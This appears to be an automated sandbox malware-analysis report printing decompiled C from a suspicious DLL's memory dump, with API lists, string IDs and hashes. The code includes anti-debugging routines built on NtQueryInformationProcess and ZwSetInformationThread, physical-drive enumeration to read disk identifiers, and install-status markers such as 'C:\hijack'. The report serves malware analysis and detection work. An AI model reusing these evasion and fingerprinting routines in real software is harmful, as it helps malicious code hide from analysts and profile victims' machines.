							E1001FF90(_t81, _t99, _t101, __eflags); // executed
							_t116 = _t114 + 0x1c - 0x1c;
							_v596 = _t116;
							_v620 = E10001160(_t116, __eflags, "installp3");
							E1001FEA0(_t81, _t99, _t101, __eflags); // executed
							_t118 = _t116 + 0x1c - 0x1c;
							_v600 = _t118;
							_v624 = E10001160(_t118, __eflags, "installp3");
							E1001FDC0(_t81, _t99, _t101, __eflags); // executed
							_v604 = _t118 + 0x1c - 0x1c;
							_v628 = E10001160(_t118 + 0x1c - 0x1c, __eflags, "status=main_over");
							E1001FF90(_t81, _t99, _t101, __eflags); // executed
						} else {
							E1001A0A0(); // executed
							_t74 = E1001A0B0(_t88); // executed
							__eflags = _t74;
							if(_t74 == 0) {
								L12:
							} else {
								__eflags = E10019D10();
								if(__eflags == 0) {
									_t76 = E1001FA30(_t81, _t99, _t101, __eflags, 0x3e8, 0); // executed
									_t113 = _t113 + 8;
									__eflags = _t76;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A260(); // executed
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t72 = _v608;
				} else {
					E10020870(__ebx, _t99, _t100, _t124, "27.5.3");
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t72 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t72;
			}











































                                                                                                                                                    0x100202d0
                                                                                                                                                    0x100202d0
                                                                                                                                                    0x100202d0
                                                                                                                                                    0x100202d3
                                                                                                                                                    0x100202d5
                                                                                                                                                    0x100202e0
                                                                                                                                                    0x100202e1
                                                                                                                                                    0x100202ee
                                                                                                                                                    0x100202ef
                                                                                                                                                    0x100202f4
                                                                                                                                                    0x10020309
                                                                                                                                                    0x1002031f
                                                                                                                                                    0x10020329
                                                                                                                                                    0x10020331
                                                                                                                                                    0x10020348
                                                                                                                                                    0x1002034d
                                                                                                                                                    0x10020350
                                                                                                                                                    0x10020352
                                                                                                                                                    0x1002038f
                                                                                                                                                    0x10020394
                                                                                                                                                    0x10020397
                                                                                                                                                    0x10020399
                                                                                                                                                    0x100203a0
                                                                                                                                                    0x100203b5
                                                                                                                                                    0x100203c9
                                                                                                                                                    0x100203e4
                                                                                                                                                    0x100203e9
                                                                                                                                                    0x100203fc
                                                                                                                                                    0x10020408
                                                                                                                                                    0x1002040e
                                                                                                                                                    0x10020415
                                                                                                                                                    0x1002041d
                                                                                                                                                    0x10020426
                                                                                                                                                    0x1002042b
                                                                                                                                                    0x1002042e
                                                                                                                                                    0x10020430
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x10020437
                                                                                                                                                    0x10020449
                                                                                                                                                    0x1002044e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x10020450
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1002044e
                                                                                                                                                    0x10020454
                                                                                                                                                    0x10020459
                                                                                                                                                    0x1002045c
                                                                                                                                                    0x1002045e
                                                                                                                                                    0x1002046e
                                                                                                                                                    0x10020474
                                                                                                                                                    0x10020479
                                                                                                                                                    0x10020481
                                                                                                                                                    0x10020487
                                                                                                                                                    0x10020489
                                                                                                                                                    0x100204bf
                                                                                                                                                    0x100204bf
                                                                                                                                                    0x100204c4
                                                                                                                                                    0x100204d4
                                                                                                                                                    0x100204da
                                                                                                                                                    0x100204e2
                                                                                                                                                    0x100204e7
                                                                                                                                                    0x100204f7
                                                                                                                                                    0x100204fd
                                                                                                                                                    0x10020505
                                                                                                                                                    0x1002050a
                                                                                                                                                    0x1002051a
                                                                                                                                                    0x10020520
                                                                                                                                                    0x1002052d
                                                                                                                                                    0x1002053d
                                                                                                                                                    0x10020543
                                                                                                                                                    0x1002048b
                                                                                                                                                    0x1002048b
                                                                                                                                                    0x10020490
                                                                                                                                                    0x10020495
                                                                                                                                                    0x10020497
                                                                                                                                                    0x100204a2
                                                                                                                                                    0x10020499
                                                                                                                                                    0x1002049e
                                                                                                                                                    0x100204a0
                                                                                                                                                    0x100204ae
                                                                                                                                                    0x100204b3
                                                                                                                                                    0x100204b6
                                                                                                                                                    0x100204b8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x100204ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x100204a0
                                                                                                                                                    0x10020497
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1002039b
                                                                                                                                                    0x1002054b
                                                                                                                                                    0x10020550
                                                                                                                                                    0x1002055a
                                                                                                                                                    0x10020564
                                                                                                                                                    0x10020569
                                                                                                                                                    0x10020354
                                                                                                                                                    0x10020359
                                                                                                                                                    0x10020361
                                                                                                                                                    0x1002036b
                                                                                                                                                    0x10020375
                                                                                                                                                    0x1002037a
                                                                                                                                                    0x1002037a
                                                                                                                                                    0x10020572
                                                                                                                                                    0x1002057d

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 10020309
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002031F
                                                                                                                                                      • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                      • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                    • String ID: 27.5.3$C:\hijack$Global\exist_sign__install_r3$installp3$installp3$status=check_debug$status=main_over$status=main_start
                                                                                                                                                    • API String ID: 3079340674-2373663193
                                                                                                                                                    • Opcode ID: 74bbd3b98019af4941f1c05678df2d483e19b498c89e9b1dd7ddcd5d7ee0c164
                                                                                                                                                    • Instruction ID: b749fa75eb575139dc08c6218dfe51eab6e1b7d5f871f29c9131bd283cb1c016
                                                                                                                                                    • Opcode Fuzzy Hash: 74bbd3b98019af4941f1c05678df2d483e19b498c89e9b1dd7ddcd5d7ee0c164
                                                                                                                                                    • Instruction Fuzzy Hash: DE5193B5D003189BEB20FBA4DC4ABDD7775EB14340F504199FA0966182EB75BB84CFA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001D7E0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E1001D7E0(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t73;
				int _t78;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF20(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v48 = _t73;
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
					if(_t78 == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF20(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CD70( &_v1596);
					_t94 = E1001CFA0(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}







































                                                                                                                                                    0x1001d7e0
                                                                                                                                                    0x1001d7ec
                                                                                                                                                    0x1001d7f3
                                                                                                                                                    0x1001da64
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da64
                                                                                                                                                    0x1001d7f9
                                                                                                                                                    0x1001d803
                                                                                                                                                    0x1001d80d
                                                                                                                                                    0x1001d81a
                                                                                                                                                    0x1001d831
                                                                                                                                                    0x1001d84c
                                                                                                                                                    0x1001d852
                                                                                                                                                    0x1001d86b
                                                                                                                                                    0x1001d871
                                                                                                                                                    0x1001d878
                                                                                                                                                    0x1001da3d
                                                                                                                                                    0x1001da4c
                                                                                                                                                    0x1001da55
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da57
                                                                                                                                                    0x1001d87e
                                                                                                                                                    0x1001d888
                                                                                                                                                    0x1001d892
                                                                                                                                                    0x1001d89c
                                                                                                                                                    0x1001d8a6
                                                                                                                                                    0x1001d8b0
                                                                                                                                                    0x1001d8ba
                                                                                                                                                    0x1001d8e3
                                                                                                                                                    0x1001d8eb
                                                                                                                                                    0x1001da37
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da37
                                                                                                                                                    0x1001d8fa
                                                                                                                                                    0x1001da16
                                                                                                                                                    0x1001da1a
                                                                                                                                                    0x1001da27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da31
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da29
                                                                                                                                                    0x1001d914
                                                                                                                                                    0x1001d91f
                                                                                                                                                    0x1001d925
                                                                                                                                                    0x1001d92c
                                                                                                                                                    0x1001d933
                                                                                                                                                    0x1001d93a
                                                                                                                                                    0x1001d941
                                                                                                                                                    0x1001d948
                                                                                                                                                    0x1001d94f
                                                                                                                                                    0x1001d956
                                                                                                                                                    0x1001d95d
                                                                                                                                                    0x1001d96f
                                                                                                                                                    0x1001d99b
                                                                                                                                                    0x1001d9a0
                                                                                                                                                    0x1001d9a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001d9ad
                                                                                                                                                    0x1001d9b6
                                                                                                                                                    0x1001d9b9
                                                                                                                                                    0x1001d9c2
                                                                                                                                                    0x1001d9ca
                                                                                                                                                    0x1001d9d3
                                                                                                                                                    0x1001d9dc
                                                                                                                                                    0x1001d9f0
                                                                                                                                                    0x1001da00
                                                                                                                                                    0x1001da05
                                                                                                                                                    0x1001da0a
                                                                                                                                                    0x1001da0c
                                                                                                                                                    0x1001da0c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001da0a
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1001D831
                                                                                                                                                    • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                    • DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D8E3
                                                                                                                                                    • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                    • String ID: \\.\PhysicalDrive%d
                                                                                                                                                    • API String ID: 381188756-2935326385
                                                                                                                                                    • Opcode ID: e97137727f7f9e22cc50c208b7a5b7e7f3b3bc9ae09514579b51e9434f28c022
                                                                                                                                                    • Instruction ID: 60c107e50da6924b8ef31c0d8cf566bb73e99a01d79af532dcb0430ee69d2642
                                                                                                                                                    • Opcode Fuzzy Hash: e97137727f7f9e22cc50c208b7a5b7e7f3b3bc9ae09514579b51e9434f28c022
                                                                                                                                                    • Instruction Fuzzy Hash: 93613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001DA70, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E1001DA70(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t43;
				int _t48;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018AA0(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
					_v16 = _t43;
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF20(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
					if(_t48 != 0) {
						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
						E1001D040(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					FindCloseChangeNotification(_v16); // executed
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}




















                                                                                                                                                    0x1001da70
                                                                                                                                                    0x1001da78
                                                                                                                                                    0x1001da81
                                                                                                                                                    0x1001dbf0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dbf0
                                                                                                                                                    0x1001da87
                                                                                                                                                    0x1001da8e
                                                                                                                                                    0x1001da95
                                                                                                                                                    0x1001da9f
                                                                                                                                                    0x1001dabc
                                                                                                                                                    0x1001dac2
                                                                                                                                                    0x1001dad8
                                                                                                                                                    0x1001dade
                                                                                                                                                    0x1001dae5
                                                                                                                                                    0x1001dbce
                                                                                                                                                    0x1001dbd4
                                                                                                                                                    0x1001dbda
                                                                                                                                                    0x1001dbe4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dbeb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dbe6
                                                                                                                                                    0x1001daeb
                                                                                                                                                    0x1001daf5
                                                                                                                                                    0x1001daff
                                                                                                                                                    0x1001db09
                                                                                                                                                    0x1001db21
                                                                                                                                                    0x1001db26
                                                                                                                                                    0x1001db50
                                                                                                                                                    0x1001db58
                                                                                                                                                    0x1001db68
                                                                                                                                                    0x1001db85
                                                                                                                                                    0x1001db9d
                                                                                                                                                    0x1001dba2
                                                                                                                                                    0x1001dba7
                                                                                                                                                    0x1001dba9
                                                                                                                                                    0x1001dba9
                                                                                                                                                    0x1001dba7
                                                                                                                                                    0x1001dbb4
                                                                                                                                                    0x1001dbbe
                                                                                                                                                    0x1001dbcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dbc0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001dbc0
                                                                                                                                                    0x1001dbbe
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                    • CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                    • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                    • DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                    • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
                                                                                                                                                    • String ID: \\.\PhysicalDrive%d
                                                                                                                                                    • API String ID: 198797371-2935326385
                                                                                                                                                    • Opcode ID: 1e14f5bedfcde0f1d0083b7920a623373936b1288cbafb94b881848d106c9552
                                                                                                                                                    • Instruction ID: 9b4efffd286bd50bfe482c34101ba058eed34944f4a677aef4757b6a92ca1a22
                                                                                                                                                    • Opcode Fuzzy Hash: 1e14f5bedfcde0f1d0083b7920a623373936b1288cbafb94b881848d106c9552
                                                                                                                                                    • Instruction Fuzzy Hash: 56412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 10019F00, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E10019F00() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}






                                                                                                                                                    0x10019f06
                                                                                                                                                    0x10019f18
                                                                                                                                                    0x10019f2a
                                                                                                                                                    0x10019f3e
                                                                                                                                                    0x10019f4d

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                    • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F3E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                    • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                    • API String ID: 3653371871-801751246
                                                                                                                                                    • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                    • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                    • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                    • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 10019F50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E10019F50() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                    0x10019f56
                                                                                                                                                    0x10019f68
                                                                                                                                                    0x10019f7a
                                                                                                                                                    0x10019f8e
                                                                                                                                                    0x10019f9d

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                    • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F8E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                    • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                    • API String ID: 3653371871-801751246
                                                                                                                                                    • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                    • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                    • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                    • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 10019FA0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E10019FA0() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                    0x10019fa6
                                                                                                                                                    0x10019fb8
                                                                                                                                                    0x10019fca
                                                                                                                                                    0x10019fde
                                                                                                                                                    0x10019fed

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                    • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FDE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                    • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                    • API String ID: 3653371871-801751246
                                                                                                                                                    • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                    • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                    • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                    • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 10019D40, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20librarythreadnativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                    0x10019d51
                                                                                                                                                    0x10019d63
                                                                                                                                                    0x10019d79

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll,?,10020490), ref: 10019D4B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 10019D6C
